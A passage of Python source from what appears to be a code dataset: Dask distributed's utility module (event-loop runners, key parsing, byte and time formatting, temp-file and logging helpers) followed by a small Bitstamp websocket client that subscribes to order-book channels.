DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(start_exc[0], Exception): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
from functools import lru_cache
except ImportError:
lru_cache = False
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in ('.py',): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip', '.pyz'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in ('.zip', '.pyz'):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return '%0.2f PB' % (n / 1e15)
if n > 1e12:
return '%0.2f TB' % (n / 1e12)
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def fix_asyncio_event_loop_policy(asyncio):
"""
Work around https://github.com/tornadoweb/tornado/issues/2183
"""
class PatchedDefaultEventLoopPolicy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
"""Get the event loop.
This may be None or an instance of EventLoop.
"""
try:
return super().get_event_loop()
except RuntimeError:
# "There is no current event loop in thread"
loop = self.new_event_loop()
self.set_event_loop(loop)
return loop
asyncio.set_event_loop_policy(PatchedDefaultEventLoopPolicy())
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
# Only bother if asyncio has been loaded by Tornado
if 'asyncio' in sys.modules:
fix_asyncio_event_loop_policy(sys.modules['asyncio'])
def has_keyword(func, keyword):
if PY3:
return keyword in inspect.signature(func).parameters
else:
# https://stackoverflow.com/questions/50100498/determine-keywords-of-a-tornado-coroutine
if gen.is_coroutine_function(func):
func = func.__wrapped__
return keyword in inspect.getargspec(func).args
if lru_cache:
has_keyword = lru_cache(1000)(has_keyword)
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = ['#440154', '#471669', '#472A79', '#433C84', '#3C4D8A', '#355D8C',
'#2E6C8E', '#287A8E', '#23898D', '#1E978A', '#20A585', '#2EB27C',
'#45BF6F', '#64CB5D', '#88D547', '#AFDC2E', '#D7E219', '#FDE724']
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
def iscoroutinefunction(f):
if gen.is_coroutine_function(f):
return True
if sys.version_info >= (3, 5) and inspect.iscoroutinefunction(f):
return True
return False
|
client.py
|
import websocket
import json
from threading import Thread
import time
# Channel options: ['live_trades_[currency_pair]', 'live_orders_[currency_pair]', 'order_book_[currency_pair]', 'detail_order_book_[currency_pair]', 'diff_order_book_[currency_pair]']
class wsClient(object):
def __init__(self,channels,url='wss://ws.bitstamp.net'):
self.url = url
self.channels = channels
self.ws=None
self.thread=None
def _connect(self):
if self.channels is None:
self.channels = ['order_book_btcusd']
params = {'event': 'bts:subscribe','data': {'channel': self.channels}}
self.ws = websocket.create_connection(self.url)
self.ws.send(json.dumps(params))
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.keepalive = Thread(target=self._keepalive)
self.thread.start()
def _keepalive(self, interval=30):
while self.ws.connected:
self.ws.ping("keepalive")
time.sleep(interval)
def _listen(self):
self.keepalive.start()
while not self.stop:
try:
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except websocket.WebSocketConnectionClosedException as e:
pass
finally:
self.keepalive.join()
def on_open(self):
print('-- WebSocket Opened --')
def on_close(self):
print("\n-- WebSocket Closed --")
def on_message(self, data):
print(data)
def on_error(self,msg):
print(msg)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.